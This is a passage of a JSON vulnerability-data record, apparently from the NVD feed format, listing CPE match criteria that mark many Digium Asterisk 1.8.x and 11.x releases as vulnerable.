              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "58F4BFC9-E02A-4121-8D34-99022AB8B45A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "447E07C9-4A25-418D-B53F-609B78EE4C21",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "9C806F87-C897-48E4-8533-A4EBC6B77078",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "08B8C143-93FF-44DD-8F61-6F4FEE977371",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "8859F234-5066-40DD-862C-0F3CCA98AFB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75962F03-EC19-4920-9FA7-2D422E6E83F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D9D7D88-D64F-4F54-8C84-6AC45FBD36F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F67AB282-591C-4ED7-9750-C593A38D5D7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "B5D0BB0E-1BB0-4F31-9C5D-DC1A069E52DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C9F8F881-2BF7-44AB-8756-54A06801EB11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "36EFF3C4-4D00-4BC5-94B9-403BB00C6AB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5E434F10-395E-426E-A988-4CDA504577D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "33FE3DCE-74B5-49A4-BC18-34B22CA83947",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF2E25F3-053D-4F7D-A35D-706A401CCAA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BA564F7-7A69-4805-8C8C-C2EB5E12A6E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2A153336-10C4-4C42-AC66-AC1351887EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "0C2FF4E9-2513-4022-AF80-6F44A2287D6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF6FA464-F9D3-4674-844B-A2B2E2C42A51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "44722C8B-BB37-4444-A58A-F01D0B3B4DDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4FABFDB-D99A-4F83-8FEE-3BFA36BA4061",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "43E00618-19F6-4828-818A-95C9106097B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "CEC4F4AE-7BD8-437F-8838-FE564BCB7FA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A842E112-8974-4E74-AD56-1DEF5B5DD9F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2BC3B463-6B2C-42AF-BE13-50B7D63E7F05",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9ACBC01-8A9D-43A5-A825-1CC9670417A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61E7199F-EACE-431A-8ADD-B96A6FCDBC49",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA7CD0E5-8E69-43B5-A5FF-8B122475CC00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2799111C-06DB-4979-8F81-A8C09D53E5F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F4BEA1B2-2103-4E25-92A9-DB107D6D4AD5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2AD9AFFB-F903-43DD-9C1D-4D8E83EA25C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "4F3C35F1-CBF2-4F77-AC19-574DEF2652A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75EA94FD-D16A-49BC-A418-36EFC187EC7A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "A14FC2A1-29D5-49FE-92A9-D61833BF1C95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "80A38E0C-45D9-4353-8426-87A4CFA371DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "5E3C5C1E-67E9-401A-BA52-FCB32CA4473C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FA4C14B-A01C-4CFE-8985-317ACCDAD209",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "501F5764-BBC2-426A-AF01-7FB477850073",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "FDB35CE5-4EDB-4949-A5E4-1BD721CCA469",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "619704FF-2F0C-47E8-A340-58135CEE6B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E412E336-871A-4CAC-97E5-FB203BB9349D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "82ED9CD2-504E-4D7B-B242-2511A7730776",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EF6E50F5-605A-4D2B-B55D-8AB251532E8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:-:*:*:*:*:*:*",
              "matchCriteriaId": "F6C796AE-95EE-4EAB-959C-1C1353C565A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EEAF3B2E-E520-4F43-ACC5-0F01A6247199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "085D4102-E2E8-496C-85B7-714FD3639BE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1A0E66-63F4-4BD0-8C9A-3D23A116EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79963FF0-5ED6-41B6-8E60-146BD7879518",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E0ABBB2C-19EC-4D6C-A1EA-AEF0ABA4123D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0787BC7B-9464-4AAA-896B-C028ECF8E397",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "84C0FBC8-9CD1-4135-94C7-BE90A7C94625",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "981F3994-392D-47DB-97DA-AC15BA070A36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "94691EE6-266F-46CE-B388-0289EB39D91A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FD3948A1-B5A6-4702-9187-A7720E81B7F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BC097BB6-02E9-4F48-98CB-B5F31B41009C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C2FD962-B1D5-41E5-884E-0C3F7F9DACE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "096E966A-878B-426F-AB40-BB476B17B969",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "852DAF2A-86F3-4D05-91DC-6A2FBC214736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7D721486-3043-4380-A73C-44B4DD0E34C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F29E2EE-B6E8-4E55-84A8-3BD0658387EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "837BF2BD-814F-4503-91DF-EE16B5A4921D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "15FCDDB3-62D8-446C-B57C-F3BBFBD13491",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "03512BDE-E441-46F6-88B7-16A2468CA199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "902CAF9D-9D02-47FA-AE2E-EC1268A32BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "80AD87B5-B796-4C44-8A6D-0B22AA2903CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D87B2B3-E40B-4BF7-91E6-3B3F9CA28719",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2575F7A4-E1F1-4836-A467-076EDD8484B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CBDFAFA3-A52F-4FC8-BA51-FE52D5F57DD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6085E437-87B8-4355-BDC0-A14EA4F52695",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C44D1ED-2435-4042-BF15-3D752BE0C661",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "23E4CE5C-375C-4ECB-A4D9-A5A6805E5FE0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "236D459B-ED50-4A2F-B463-D2F9DD1C7E8E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9EEB00A-68B0-4CDE-B625-AB83B1D6D2F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.32.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "72195459-404F-423E-A78C-DE2A728AFDA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9FD404B4-2B0A-4D7A-8CF6-E2C6B4BACBB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "69F2DED4-39F5-44C8-BEA3-22692D28C631",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "AD172E70-238B-4B01-A922-8021B5627092",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5FB3863D-7F46-4C4A-9E6B-C255CDF0D953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7239304D-C383-4F26-BB08-65ADD2380015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AC153C2-258E-4EE6-845F-8E8C68AA242D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "1453BB31-D674-4A05-AB2A-2502D127C3E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "326845DF-2DB2-406B-BE0F-877384DAACFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E0FC2D46-FD1B-421F-8773-BB41B1E9A831",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8788AF7B-CBB6-4D9D-A748-486787935A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1794440C-7068-4673-9142-6221B8A39E5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C5CF286B-3377-4AE9-A7B9-8535641D639A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6695F632-6AC4-400F-B513-280304ABC1F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A3423C40-240A-4237-8B0F-A4B4ED421C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "03298D9F-CFB8-48F9-BD0C-8A0BEB0760C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
